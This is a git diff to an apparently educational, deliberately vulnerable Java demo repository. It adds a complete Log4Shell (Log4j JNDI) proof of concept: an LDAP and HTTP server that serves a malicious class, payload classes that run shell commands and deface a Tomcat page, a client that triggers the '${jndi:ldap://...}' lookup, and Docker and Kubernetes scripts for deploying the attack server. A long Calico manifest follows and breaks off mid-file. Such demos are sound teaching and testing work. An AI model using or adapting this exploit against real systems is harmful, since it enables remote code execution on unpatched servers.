diff --git a/.gitignore b/.gitignore index b0e2ec7ea5..6498370b82 100644 --- a/.gitignore +++ b/.gitignore @@ -1,4 +1,4 @@ *.iml .idea -*/target/** +**/target/** **/.DS_Store diff --git a/README.md b/README.md index 9e03f33bba..b9e44272f0 100644 --- a/README.md +++ b/README.md @@ -1,46 +1,8 @@ ## Java Goof -A vulnerable demo application, initially based on [Ben Hassine](https://github.com/benas/)'s [TodoMVC](https://github.com/benas/todolist-mvc). +This is a collection of Java demo apps that are vulnerable in different ways. -The goal of this application is to demonstrate through example how to find, exploit and fix vulnerable Maven packages. +It's divided into modules, each one having its own README: -This repo is still incomplete, a work in progress to support related presentations. - - -## Build and run Todolist MVC - -(from the original README) - -### Local build and run - -*Note that to run locally, you need JDK 8.* - -1. Check out the project source code from github : `git clone https://github.com/snyk/java-goof.git` -2. Open a terminal and run the following command from root directory : `mvn install` -3. Choose a web framework to test and run it. For example : `cd todolist-web-struts && mvn tomcat7:run` (note: this example currently only copied the Struts demo) -4. Browse the following URL : `localhost:8080/` -5. You can register a new account or login using the following credentials : foo@bar.org / foobar - -### Build and run with docker-compose - -*Note, we run build on and a Tomcat 8.5 image here to support tomcat-rce base image demo.* -```bash -docker-compose up --build -docker-compose down -``` - -## Deploy Application on Heroku - -- [Heroku instructions](DEPLOY_HEROKU.md) - -## Open source vulnerability exploit - -TODO - -## Container base image vulnerability exploit - -- [Container base image exploit instructions](exploits/tomcat-rce/README.md) - -## License -This repo is available released under the [MIT License](http://opensource.org/licenses/mit-license.php/). -# java-goof +* [Todolist Goof](todolist-goof/README.md) +* [Log4Shell Goof](log4shell-goof/README.md) diff --git a/log4shell-goof/README.md b/log4shell-goof/README.md new file mode 100644 index 0000000000..d5552faabc --- /dev/null +++ b/log4shell-goof/README.md @@ -0,0 +1,98 @@ +## Log4Shell Goof + +The purpose of this project is to demonstrate the Log4Shell exploit with Log4J versions older than `2.15.0`. + +This repo is based on the excellent proof-of-concept published by [BrianV](https://github.com/bmvermeer/log4jexploit/). +The PoC is a great starting point. This project expands on it by fleshing it out into a fully standalone demo. + +For more information about the exploit and the mechanics of how it works, +[here is a good blog post](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/). + +### Requirements + +You'll need one of the following Java SDKs: + * 11.0.1 or earlier + * 8u191 or earlier + * 7u201 or earlier + * 6u211 or earlier + +Java SDKs newer than those versions don't have the same vulnerability. + +### Building the PoC + +In the root folder, run: + +``` +mvn clean install +``` + +**NOTE:** This project includes the Maven wrapper, so you don't need to have previously installed Maven. + +### Running the PoC + +This repo has two modules: server and client. + +The server module runs a lean LDAP & HTTP server. + +The LDAP server listens on port `9999` by default and will return an `LDAPResult` that includes a URL reference to a +Java class that will be deserialized and executed. + +The HTTP server listens on port `8000` and responds to any request with a byte array that is the `Evil.class`. + +`Evil` implements `ObjecFactory` which the JNDI mechanism hooks into to execute its `getObjectInstance` method. While +the method simply returns `null`, it uses `Runtime` to execute arbitrary code on the host machine. In this case, it +writes to a file called: `/tmp/pwned` to prove that it _could_ execute basically anything available on the machine. + +This PoC should run as-is on Linux or Mac. + +Open a terminal window and run the following: + +``` +cd log4shell-server +mvn exec:java -Dexec.mainClass="Server" +``` + +You should see output that looks like the following: + +``` +[INFO] --- exec-maven-plugin:3.0.0:java (default-cli) @ log4shell-server --- +LDAP server listening on 0.0.0.0:9999 +HTTP server listening on 0.0.0.0:8000 +``` + +In another terminal window, run the following: + +``` +cd log4shell-client +JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_111.jdk/Contents/Home \ +mvn exec:java -Dexec.mainClass="Main" +``` + +**NOTE:** Referencing `JAVA_HOME` is important as the exploit only fully works with older JDK versions. +For example, you can download JDK 8u111 +[here](https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html). If you download +and install the version for Mac, the above command will work for you. + +You should see output that looks like the following: + +``` +[INFO] --- exec-maven-plugin:3.0.0:java (default-cli) @ log4shell-client --- +---------- JVM Props ------------- +java.vm.version=25.111-b14 +java.vm.vendor=Oracle Corporation +java.vm.name=Java HotSpot(TM) 64-Bit Server VM +java.vm.specification.name=Java Virtual Machine Specification +java.vm.specification.vendor=Oracle Corporation +java.vm.specification.version=1.8 +java.vm.info=mixed mode +--------------------------------- +20:27:49.676 [Main.main()] ERROR Main - test +/tmp/pwned DOES NOT EXIST +20:27:49.679 [Main.main()] ERROR Main - Output:${jndi:ldap://127.0.0.1:9999/Evil} +/tmp/pwned EXISTS - yah been pwned! +``` + +**NOTE**: The client app will tell you if it was successful. It does some checks, including looking for the +`/tmp/pwned` file before and after the attack. You MUST delete the `/tmp/pwned` file between runs in order for the +client app to work properly. The file not being there and then being present after the attack is how it knows it's +been successful. diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml new file mode 100644 index 0000000000..26e8a05bd9 --- /dev/null +++ b/log4shell-goof/log4shell-client/pom.xml @@ -0,0 +1,34 @@ + + + 4.0.0 + + log4shell-poc + io.snyk + 0.0.1-SNAPSHOT + + + log4shell-client + 0.0.1-SNAPSHOT + + Java Goof :: Log4Shell Goof :: Log4Shell Client + https://snyk.io + + + UTF-8 + 8 + 8 + + + + + org.apache.logging.log4j + log4j-core + 2.14.1 + + + org.apache.logging.log4j + log4j-api + 2.14.1 + + + diff --git a/log4shell-goof/log4shell-client/src/main/java/Main.java b/log4shell-goof/log4shell-client/src/main/java/Main.java new file mode 100644 index 0000000000..2671997d4c --- /dev/null +++ b/log4shell-goof/log4shell-client/src/main/java/Main.java @@ -0,0 +1,43 @@ +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.io.File; + +public class Main { + + private static final String PWN_FILE = "/tmp/pwned"; + private static final Logger logger = LogManager.getLogger(Main.class); + + public static void main(String[] args) throws InterruptedException { + showJavaStats(); + logger.error("test"); + checkTmp(false); + logger.error("Output:" + "${jndi:ldap://127.0.0.1:9999/Evil}"); + // give a beat for the file to be written + Thread.sleep(1000); + checkTmp(true); + } + + public static void showJavaStats() { + System.out.println("---------- JVM Props -------------"); + System.getProperties().entrySet().stream() + .filter(entry -> ((String)entry.getKey()).startsWith("java.vm.")) + .forEach(System.out::println); + System.out.println("---------------------------------"); + } + + public static void checkTmp(boolean shouldExist) { + File f = new File(PWN_FILE); + if (shouldExist != f.exists()) { + String exStr = String.format( + "\n\tUnexpected state." + + "\n\tMake sure to remove %s between runs." + + "\n\tMake sure Server is running." + + "\n\tMake sure you JVM is <= 11.0.1 or 8u191 or 7u201 or 6u211", + PWN_FILE + ); + throw new RuntimeException(exStr); + } + System.out.println(String.format("%s %s", PWN_FILE, f.exists()?"EXISTS - yah been pwned!":"DOES NOT EXIST")); + } +} \ No newline at end of file diff --git a/log4shell-goof/log4shell-server/Dockerfile b/log4shell-goof/log4shell-server/Dockerfile new file mode 100644 index 0000000000..d47ecfd219 --- /dev/null +++ b/log4shell-goof/log4shell-server/Dockerfile @@ -0,0 +1,11 @@ +FROM maven:3-jdk-8-slim as build +COPY . . +RUN --mount=target=$HOME/.m2,type=cache mvn clean compile assembly:single + +FROM openjdk:8 as ldap +COPY --from=build target/*.jar /server.jar +EXPOSE 8000 +EXPOSE 9999 + +CMD ["java", "-jar", "/server.jar", "http://evil.darkweb:9999/#Vandalize", "8000", "9999", "Vandalize.class"] + diff --git a/log4shell-goof/log4shell-server/k8s/deploy.yaml b/log4shell-goof/log4shell-server/k8s/deploy.yaml new file mode 100644 index 0000000000..9fd6036731 --- /dev/null +++ b/log4shell-goof/log4shell-server/k8s/deploy.yaml @@ -0,0 +1,53 @@ +--- +apiVersion: v1 +kind: Namespace +metadata: + name: darkweb +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + labels: + app: log4shell + name: log4shell + namespace: darkweb +spec: + replicas: 1 + selector: + matchLabels: + app: log4shell + template: + metadata: + labels: + app: log4shell + spec: + containers: + - name: ldap + image: ${DOCKER_ACCOUNT}/log4shell-server:latest +--- +apiVersion: v1 +kind: Service +metadata: + name: ldap + namespace: darkweb +spec: + selector: + app: log4shell + ports: + - protocol: TCP + port: 80 + targetPort: 8000 +--- +apiVersion: v1 +kind: Service +metadata: + name: evil + namespace: darkweb +spec: + selector: + app: log4shell + ports: + - protocol: TCP + port: 9999 + targetPort: 9999 + diff --git a/log4shell-goof/log4shell-server/k8s/imagebuild.sh b/log4shell-goof/log4shell-server/k8s/imagebuild.sh new file mode 100755 index 0000000000..141fba743a --- /dev/null +++ b/log4shell-goof/log4shell-server/k8s/imagebuild.sh @@ -0,0 +1,9 @@ +#!/usr/bin/env bash +read -e -i "${DOCKER_ACCOUNT}" -p "Please enter your DockerHub user/account name: " input +name="${input:-$DOCKER_ACCOUNT}" + +echo "📦 Building image ${DOCKER_ACCOUNT}/log4shell-server:latest ..." +docker build -t ${DOCKER_ACCOUNT}/log4shell-server:latest . +echo +echo "🚚 Pushing image to DockerHub..." +docker push ${DOCKER_ACCOUNT}/log4shell-server:latest diff --git a/log4shell-goof/log4shell-server/k8s/shutdown.sh b/log4shell-goof/log4shell-server/k8s/shutdown.sh new file mode 100755 index 0000000000..50cd2db35b --- /dev/null +++ b/log4shell-goof/log4shell-server/k8s/shutdown.sh @@ -0,0 +1,4 @@ +#!/usr/bin/env bash +MYDIR=$(dirname $0) +echo "Removing app from kubernetes..." +kubectl delete -f $MYDIR/deploy.yaml diff --git a/log4shell-goof/log4shell-server/k8s/startup.sh b/log4shell-goof/log4shell-server/k8s/startup.sh new file mode 100755 index 0000000000..55fd3d0bc7 --- /dev/null +++ b/log4shell-goof/log4shell-server/k8s/startup.sh @@ -0,0 +1,14 @@ +#!/usr/bin/env bash +MYDIR=$(dirname $0) +read -e -i "${DOCKER_ACCOUNT}" -p "Please enter your DockerHub user/account name: " input +name="${input:-$DOCKER_ACCOUNT}" + +cat $MYDIR/deploy.yaml | envsubst | kubectl apply -f - + +echo "⌚️ Waiting for pod deployment..." +kubectl wait --namespace=darkweb \ + --for=condition=ready pod \ + --selector=app=log4shell \ + --timeout=90s + + diff --git a/log4shell-goof/log4shell-server/pom.xml b/log4shell-goof/log4shell-server/pom.xml new file mode 100644 index 0000000000..d502a27d12 --- /dev/null +++ b/log4shell-goof/log4shell-server/pom.xml @@ -0,0 +1,52 @@ + + + 4.0.0 + + io.snyk + log4shell-server + 0.0.1-SNAPSHOT + + Java Goof :: Log4Shell Goof :: Log4Shell Server + https://snyk.io + + + UTF-8 + 8 + 8 + + + + + org.apache.logging.log4j + log4j-core + 2.15.0 + + + com.unboundid + unboundid-ldapsdk + 3.1.1 + + + io.undertow + undertow-core + 2.2.13.Final + + + + + + maven-assembly-plugin + + + + Server + + + + jar-with-dependencies + + + + + + diff --git a/log4shell-goof/log4shell-server/src/main/java/Evil.java b/log4shell-goof/log4shell-server/src/main/java/Evil.java new file mode 100644 index 0000000000..d027d9f7e2 --- /dev/null +++ b/log4shell-goof/log4shell-server/src/main/java/Evil.java @@ -0,0 +1,17 @@ +import javax.naming.Context; +import javax.naming.Name; +import javax.naming.spi.ObjectFactory; +import java.util.Hashtable; + +public class Evil implements ObjectFactory { + @Override + public Object getObjectInstance (Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception { + String[] cmd = { + "/bin/sh", + "-c", + "echo PWNED > /tmp/pwned" + }; + Runtime.getRuntime().exec(cmd); + return null; + } +} diff --git a/log4shell-goof/log4shell-server/src/main/java/Server.java b/log4shell-goof/log4shell-server/src/main/java/Server.java new file mode 100644 index 0000000000..ecb8a354aa --- /dev/null +++ b/log4shell-goof/log4shell-server/src/main/java/Server.java @@ -0,0 +1,131 @@ +import com.unboundid.ldap.listener.InMemoryDirectoryServer; +import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig; +import com.unboundid.ldap.listener.InMemoryListenerConfig; +import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult; +import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor; +import com.unboundid.ldap.sdk.Entry; +import com.unboundid.ldap.sdk.LDAPException; +import com.unboundid.ldap.sdk.LDAPResult; +import com.unboundid.ldap.sdk.ResultCode; +import io.undertow.Undertow; +import io.undertow.util.Headers; + +import javax.net.ServerSocketFactory; +import javax.net.SocketFactory; +import javax.net.ssl.SSLSocketFactory; +import java.io.ByteArrayOutputStream; +import java.io.IOException; +import java.io.InputStream; +import java.net.InetAddress; +import java.net.MalformedURLException; +import java.net.URL; +import java.net.UnknownHostException; +import java.nio.ByteBuffer; + +public class Server { + private static final String LDAP_BASE = "dc=example,dc=com" ; + private static String payloadClassname; + public static void main (String[] args) throws IOException, LDAPException { + String[] defaultArgs = {"http://127.0.0.1:8000/#Evil", "9999", "8000", "Evil.class"}; + + if (args.length != 4) { + args = defaultArgs; + } + payloadClassname = args[3]; + + setupLDAP(args[0], Integer.parseInt(args[1])); + setupHTTP(Integer.parseInt(args[2])); + } + + private static void setupLDAP(String evilUrl, int port) + throws LDAPException, MalformedURLException, UnknownHostException + { + InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE); + config.setListenerConfigs(new InMemoryListenerConfig( + "listen" , + InetAddress.getByName( "0.0.0.0" ), + port, + ServerSocketFactory.getDefault(), + SocketFactory.getDefault(), + (SSLSocketFactory) SSLSocketFactory.getDefault() + )); + + config.addInMemoryOperationInterceptor(new OperationInterceptor( new URL(evilUrl))); + InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config); + System.out.println( "LDAP server listening on 0.0.0.0:" + port); + ds.startListening(); + } + + private static void setupHTTP(int port) throws IOException { + byte[] targetArray = readEvil(); + + Undertow server = Undertow.builder() + .addHttpListener(port, "0.0.0.0") + + // keep it simple - any request returns our Evil.class + .setHandler(exchange -> { + System.out.println("Send HTTP class byte array result"); + exchange.getResponseHeaders().put(Headers.CONTENT_TYPE, "application/octet-stream"); + exchange.getResponseSender().send(ByteBuffer.wrap(targetArray)); + }).build(); + + System.out.println( "HTTP server listening on 0.0.0.0:" + port); + server.start(); + } + + private static byte[] readEvil() throws IOException { + InputStream is = Server.class.getClassLoader().getResourceAsStream(payloadClassname); + ByteArrayOutputStream bos = new ByteArrayOutputStream(); + + int nRead; + byte[] data = new byte[4]; + + while ((nRead = is.read(data, 0, data.length)) != -1) { + bos.write(data, 0, nRead); + } + + bos.flush(); + return bos.toByteArray(); + } + + private static class OperationInterceptor extends InMemoryOperationInterceptor { + + private final URL codebase; + + public OperationInterceptor(URL cb) { + this.codebase = cb; + } + + @Override + public void processSearchResult(InMemoryInterceptedSearchResult result) { + String base = result.getRequest().getBaseDN(); + Entry entry = new Entry(base); + + try { + sendResult(result, base, entry); + } catch (LDAPException | MalformedURLException e) { + e.printStackTrace(); + } + } + + protected void sendResult(InMemoryInterceptedSearchResult result, String base, Entry e) + throws LDAPException, MalformedURLException + { + URL turl = new URL( + this.codebase, this.codebase.getRef().replace('.', '/').concat(".class") + ); + System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl); + e.addAttribute("javaClassName", "foo"); + String cbstring = this.codebase.toString(); + int refPos = cbstring.indexOf('#'); + if (refPos > 0) { + cbstring = cbstring.substring(0, refPos); + } + e.addAttribute("javaCodeBase", cbstring); + e.addAttribute("objectClass", "javaNamingReference"); //$NON-NLS-1$ + e.addAttribute("javaFactory", this.codebase.getRef()); + result.sendSearchEntry(e); + result.setResult(new LDAPResult(0, ResultCode.SUCCESS)); + } + } +} diff --git a/log4shell-goof/log4shell-server/src/main/java/Vandalize.java b/log4shell-goof/log4shell-server/src/main/java/Vandalize.java new file mode 100644 index 0000000000..2845f54c50 --- /dev/null +++ b/log4shell-goof/log4shell-server/src/main/java/Vandalize.java @@ -0,0 +1,16 @@ +import javax.naming.Context; +import javax.naming.Name; +import javax.naming.spi.ObjectFactory; +import java.util.Hashtable; + +public class Vandalize implements ObjectFactory { + @Override + public Object getObjectInstance (Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception { + String[] cmd = { + "/bin/sh", + "-c", + "echo '

Nice container you have, I think I will move in!

' >> /usr/local/tomcat/webapps/todolist/WEB-INF/views/common/header.jspf"}; + Runtime.getRuntime().exec(cmd); + return null; + } +} diff --git a/log4shell-goof/pom.xml b/log4shell-goof/pom.xml new file mode 100644 index 0000000000..6eb158372a --- /dev/null +++ b/log4shell-goof/pom.xml @@ -0,0 +1,22 @@ + + + 4.0.0 + + io.snyk + log4shell-poc + 0.0.1-SNAPSHOT + pom + + Java Goof :: Log4Shell Goof + + + UTF-8 + 1.8 + 1.8 + + + + log4shell-server + log4shell-client + + diff --git a/pom.xml b/pom.xml index f168999e16..6701109dca 100644 --- a/pom.xml +++ b/pom.xml @@ -3,44 +3,18 @@ 4.0.0 io.github.snyk - todolist-mvc - 1.0-SNAPSHOT - Todolist MVC parent module - A vulnerable demo application, initially based on Ben Hassine's TodoMVC. - https://github.com/snyk/java-goof - - - 3.2.6.RELEASE - 4.3.7.Final - 5.3.8 - 2.3.20 - UTF-8 - + java-goof + 0.0.1-SNAPSHOT + Java Goof + A collection of vulnerable Java apps + https://github.com/snyk-labs/java-goof - todolist-core - todolist-web-common - todolist-web-struts + todolist-goof + log4shell-goof pom - - - javax.xml.bind - jaxb-api - 2.3.0 - - - com.sun.xml.bind - jaxb-core - 2.3.0 - - - com.sun.xml.bind - jaxb-impl - 2.3.0 - - @@ -48,54 +22,4 @@ http://opensource.org/licenses/mit-license.php - - - - - - org.apache.maven.plugins - maven-compiler-plugin - 3.2 - - true - 1.7 - 1.7 - true - - - - org.apache.maven.plugins - maven-dependency-plugin - 2.9 - - - install - install - - sources - - - - - - org.apache.maven.plugins - maven-war-plugin - 3.2.3 - - todolist - - - - org.apache.tomcat.maven - tomcat7-maven-plugin - 2.2 - - target/todolist.war - / - - - - - - diff --git a/DEPLOY_HEROKU.md b/todolist-goof/DEPLOY_HEROKU.md similarity index 100% rename from DEPLOY_HEROKU.md rename to todolist-goof/DEPLOY_HEROKU.md diff --git a/Dockerfile b/todolist-goof/Dockerfile similarity index 87% rename from Dockerfile rename to todolist-goof/Dockerfile index bbc40a06de..d37dfaeafa 100644 --- a/Dockerfile +++ b/todolist-goof/Dockerfile @@ -9,6 +9,6 @@ FROM tomcat:8.5.21 RUN mkdir /tmp/extracted_files COPY --chown=tomcat:tomcat web.xml /usr/local/tomcat/conf/web.xml -COPY --from=build /usr/src/goof/todolist-web-struts/target/todolist.war /usr/local/tomcat/webapps/todolist.war +COPY --from=build /usr/src/goof/todolist-web-struts/target/todolist /usr/local/tomcat/webapps/todolist COPY --from=build /usr/local/openjdk-8/bin/native2ascii /docker-java-home/jre/bin/native2ascii -COPY --from=build /usr/local/openjdk-8/lib/tools.jar /docker-java-home/jre/lib/tools.jar \ No newline at end of file +COPY --from=build /usr/local/openjdk-8/lib/tools.jar /docker-java-home/jre/lib/tools.jar diff --git a/Procfile b/todolist-goof/Procfile similarity index 100% rename from Procfile rename to todolist-goof/Procfile diff --git a/todolist-goof/README.md b/todolist-goof/README.md new file mode 100644 index 0000000000..c458877c4d --- /dev/null +++ b/todolist-goof/README.md @@ -0,0 +1,46 @@ +## Todolist Goof + +A vulnerable demo application, initially based on [Ben Hassine](https://github.com/benas/)'s [TodoMVC](https://github.com/benas/todolist-mvc). + +The goal of this application is to demonstrate through example how to find, exploit and fix vulnerable Maven packages. + +This repo is still incomplete, a work in progress to support related presentations. + + +## Build and run Todolist MVC + +(from the original README) + +### Local build and run + +*Note that to run locally, you need JDK 8.* + +1. Check out the project source code from github : `git clone https://github.com/snyk/java-goof.git` +2. Open a terminal and run the following command from root directory : `mvn install` +3. Choose a web framework to test and run it. For example : `cd todolist-web-struts && mvn tomcat7:run` (note: this example currently only copied the Struts demo) +4. Browse the following URL : `localhost:8080/` +5. You can register a new account or login using the following credentials : foo@bar.org / foobar + +### Build and run with docker-compose + +*Note, we run build on and a Tomcat 8.5 image here to support tomcat-rce base image demo.* +```bash +docker-compose up --build +docker-compose down +``` + +## Deploy Application on Heroku + +- [Heroku instructions](DEPLOY_HEROKU.md) + +## Open source vulnerability exploit + +TODO + +## Container base image vulnerability exploit + +- [Container base image exploit instructions](exploits/tomcat-rce/README.md) + +## License +This repo is available released under the [MIT License](http://opensource.org/licenses/mit-license.php/). +# java-goof diff --git a/docker-compose.yml b/todolist-goof/docker-compose.yml similarity index 100% rename from docker-compose.yml rename to todolist-goof/docker-compose.yml diff --git a/exploits/http-vuln-struts-detection.nse b/todolist-goof/exploits/http-vuln-struts-detection.nse similarity index 100% rename from exploits/http-vuln-struts-detection.nse rename to todolist-goof/exploits/http-vuln-struts-detection.nse diff --git a/exploits/loc-stats.txt b/todolist-goof/exploits/loc-stats.txt similarity index 100% rename from exploits/loc-stats.txt rename to todolist-goof/exploits/loc-stats.txt diff --git a/exploits/struts-aliases.sh b/todolist-goof/exploits/struts-aliases.sh similarity index 100% rename from exploits/struts-aliases.sh rename to todolist-goof/exploits/struts-aliases.sh diff --git a/exploits/struts-exploit-docker-tomcat.sh b/todolist-goof/exploits/struts-exploit-docker-tomcat.sh similarity index 100% rename from exploits/struts-exploit-docker-tomcat.sh rename to todolist-goof/exploits/struts-exploit-docker-tomcat.sh diff --git a/exploits/struts-exploit-headers.txt b/todolist-goof/exploits/struts-exploit-headers.txt similarity index 100% rename from exploits/struts-exploit-headers.txt rename to todolist-goof/exploits/struts-exploit-headers.txt diff --git a/exploits/struts-exploit.sh b/todolist-goof/exploits/struts-exploit.sh similarity index 100% rename from exploits/struts-exploit.sh rename to todolist-goof/exploits/struts-exploit.sh diff --git a/exploits/tomcat-rce.sh b/todolist-goof/exploits/tomcat-rce.sh similarity index 100% rename from exploits/tomcat-rce.sh rename to todolist-goof/exploits/tomcat-rce.sh diff --git a/exploits/tomcat-rce/Dockerfile b/todolist-goof/exploits/tomcat-rce/Dockerfile similarity index 100% rename from exploits/tomcat-rce/Dockerfile rename to todolist-goof/exploits/tomcat-rce/Dockerfile diff --git a/exploits/tomcat-rce/README.md b/todolist-goof/exploits/tomcat-rce/README.md similarity index 100% rename from exploits/tomcat-rce/README.md rename to todolist-goof/exploits/tomcat-rce/README.md diff --git a/exploits/tomcat-rce/dpkg-cmd.png b/todolist-goof/exploits/tomcat-rce/dpkg-cmd.png similarity index 100% rename from exploits/tomcat-rce/dpkg-cmd.png rename to todolist-goof/exploits/tomcat-rce/dpkg-cmd.png diff --git a/exploits/tomcat-rce/exploit.py b/todolist-goof/exploits/tomcat-rce/exploit.py similarity index 100% rename from exploits/tomcat-rce/exploit.py rename to todolist-goof/exploits/tomcat-rce/exploit.py diff --git a/exploits/tomcat-rce/whoami-cmd.png b/todolist-goof/exploits/tomcat-rce/whoami-cmd.png similarity index 100% rename from exploits/tomcat-rce/whoami-cmd.png rename to todolist-goof/exploits/tomcat-rce/whoami-cmd.png diff --git a/exploits/zip-slip-tempdir.zip b/todolist-goof/exploits/zip-slip-tempdir.zip similarity index 100% rename from exploits/zip-slip-tempdir.zip rename to todolist-goof/exploits/zip-slip-tempdir.zip diff --git a/exploits/zip-slip.py b/todolist-goof/exploits/zip-slip.py similarity index 100% rename from exploits/zip-slip.py rename to todolist-goof/exploits/zip-slip.py diff --git a/exploits/zip-slip.zip b/todolist-goof/exploits/zip-slip.zip similarity index 100% rename from exploits/zip-slip.zip rename to todolist-goof/exploits/zip-slip.zip diff --git a/exploits/zipslip-docker-tomcat.zip b/todolist-goof/exploits/zipslip-docker-tomcat.zip similarity index 100% rename from exploits/zipslip-docker-tomcat.zip rename to todolist-goof/exploits/zipslip-docker-tomcat.zip diff --git a/todolist-goof/k8s/calico.yaml b/todolist-goof/k8s/calico.yaml new file mode 100644 index 0000000000..f79ef13bcd --- /dev/null +++ b/todolist-goof/k8s/calico.yaml @@ -0,0 +1,4441 @@ +--- +# Source: calico/templates/calico-config.yaml +# This ConfigMap is used to configure a self-hosted Calico installation. +kind: ConfigMap +apiVersion: v1 +metadata: + name: calico-config + namespace: kube-system +data: + # Typha is disabled. + typha_service_name: "none" + # Configure the backend to use. + calico_backend: "bird" + + # Configure the MTU to use for workload interfaces and tunnels. + # By default, MTU is auto-detected, and explicitly setting this field should not be required. + # You can override auto-detection by providing a non-zero value. + veth_mtu: "0" + + # The CNI network configuration to install on each node. The special + # values in this config will be automatically populated. + cni_network_config: |- + { + "name": "k8s-pod-network", + "cniVersion": "0.3.1", + "plugins": [ + { + "type": "calico", + "log_level": "info", + "log_file_path": "/var/log/calico/cni/cni.log", + "datastore_type": "kubernetes", + "nodename": "__KUBERNETES_NODE_NAME__", + "mtu": __CNI_MTU__, + "ipam": { + "type": "calico-ipam" + }, + "policy": { + "type": "k8s" + }, + "kubernetes": { + "kubeconfig": "__KUBECONFIG_FILEPATH__" + } + }, + { + "type": "portmap", + "snat": true, + "capabilities": {"portMappings": true} + }, + { + "type": "bandwidth", + "capabilities": {"bandwidth": true} + } + ] + } + +--- +# Source: calico/templates/kdd-crds.yaml + +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: bgpconfigurations.crd.projectcalico.org +spec: + group: crd.projectcalico.org + names: + kind: BGPConfiguration + listKind: BGPConfigurationList + plural: bgpconfigurations + singular: bgpconfiguration + scope: Cluster + versions: + - name: v1 + schema: + openAPIV3Schema: + description: BGPConfiguration contains the configuration for any BGP routing. + properties: + apiVersion: + description: 'APIVersion defines the versioned schema of this representation + of an object. Servers should convert recognized schemas to the latest + internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources' + type: string + kind: + description: 'Kind is a string value representing the REST resource this + object represents. Servers may infer this from the endpoint the client + submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds' + type: string + metadata: + type: object + spec: + description: BGPConfigurationSpec contains the values of the BGP configuration. + properties: + asNumber: + description: 'ASNumber is the default AS number used by a node. [Default: + 64512]' + format: int32 + type: integer + communities: + description: Communities is a list of BGP community values and their + arbitrary names for tagging routes. + items: + description: Community contains standard or large community value + and its name. + properties: + name: + description: Name given to community value. + type: string + value: + description: Value must be of format `aa:nn` or `aa:nn:mm`. + For standard community use `aa:nn` format, where `aa` and + `nn` are 16 bit number. For large community use `aa:nn:mm` + format, where `aa`, `nn` and `mm` are 32 bit number. Where, + `aa` is an AS Number, `nn` and `mm` are per-AS identifier. + pattern: ^(\d+):(\d+)$|^(\d+):(\d+):(\d+)$ + type: string + type: object + type: array + listenPort: + description: ListenPort is the port where BGP protocol should listen. + Defaults to 179 + maximum: 65535 + minimum: 1 + type: integer + logSeverityScreen: + description: 'LogSeverityScreen is the log severity above which logs + are sent to the stdout. [Default: INFO]' + type: string + nodeToNodeMeshEnabled: + description: 'NodeToNodeMeshEnabled sets whether full node to node + BGP mesh is enabled. [Default: true]' + type: boolean + prefixAdvertisements: + description: PrefixAdvertisements contains per-prefix advertisement + configuration. + items: + description: PrefixAdvertisement configures advertisement properties + for the specified CIDR. + properties: + cidr: + description: CIDR for which properties should be advertised. + type: string + communities: + description: Communities can be list of either community names + already defined in `Specs.Communities` or community value + of format `aa:nn` or `aa:nn:mm`. For standard community use + `aa:nn` format, where `aa` and `nn` are 16 bit number. For + large community use `aa:nn:mm` format, where `aa`, `nn` and + `mm` are 32 bit number. Where,`aa` is an AS Number, `nn` and + `mm` are per-AS identifier. + items: + type: string + type: array + type: object + type: array + serviceClusterIPs: + description: ServiceClusterIPs are the CIDR blocks from which service + cluster IPs are allocated. If specified, Calico will advertise these + blocks, as well as any cluster IPs within them. + items: + description: ServiceClusterIPBlock represents a single allowed ClusterIP + CIDR block. + properties: + cidr: + type: string + type: object + type: array + serviceExternalIPs: + description: ServiceExternalIPs are the CIDR blocks for Kubernetes + Service External IPs. Kubernetes Service ExternalIPs will only be + advertised if they are within one of these blocks. + items: + description: ServiceExternalIPBlock represents a single allowed + External IP CIDR block. + properties: + cidr: + type: string + type: object + type: array + serviceLoadBalancerIPs: + description: ServiceLoadBalancerIPs are the CIDR blocks for Kubernetes + Service LoadBalancer IPs. Kubernetes Service status.LoadBalancer.Ingress + IPs will only be advertised if they are within one of these blocks. + items: + description: ServiceLoadBalancerIPBlock represents a single allowed + LoadBalancer IP CIDR block. + properties: + cidr: + type: string + type: object + type: array + type: object + type: object + served: true + storage: true +status: + acceptedNames: + kind: "" + plural: "" + conditions: [] + storedVersions: [] + +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: bgppeers.crd.projectcalico.org +spec: + group: crd.projectcalico.org + names: + kind: BGPPeer + listKind: BGPPeerList + plural: bgppeers + singular: bgppeer + scope: Cluster + versions: + - name: v1 + schema: + openAPIV3Schema: + properties: + apiVersion: + description: 'APIVersion defines the versioned schema of this representation + of an object. Servers should convert recognized schemas to the latest + internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources' + type: string + kind: + description: 'Kind is a string value representing the REST resource this + object represents. Servers may infer this from the endpoint the client + submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds' + type: string + metadata: + type: object + spec: + description: BGPPeerSpec contains the specification for a BGPPeer resource. + properties: + asNumber: + description: The AS Number of the peer. + format: int32 + type: integer + keepOriginalNextHop: + description: Option to keep the original nexthop field when routes + are sent to a BGP Peer. Setting "true" configures the selected BGP + Peers node to use the "next hop keep;" instead of "next hop self;"(default) + in the specific branch of the Node on "bird.cfg". + type: boolean + maxRestartTime: + description: Time to allow for software restart. When specified, + this is configured as the graceful restart timeout. When not specified, + the BIRD default of 120s is used. + type: string + node: + description: The node name identifying the Calico node instance that + is targeted by this peer. If this is not set, and no 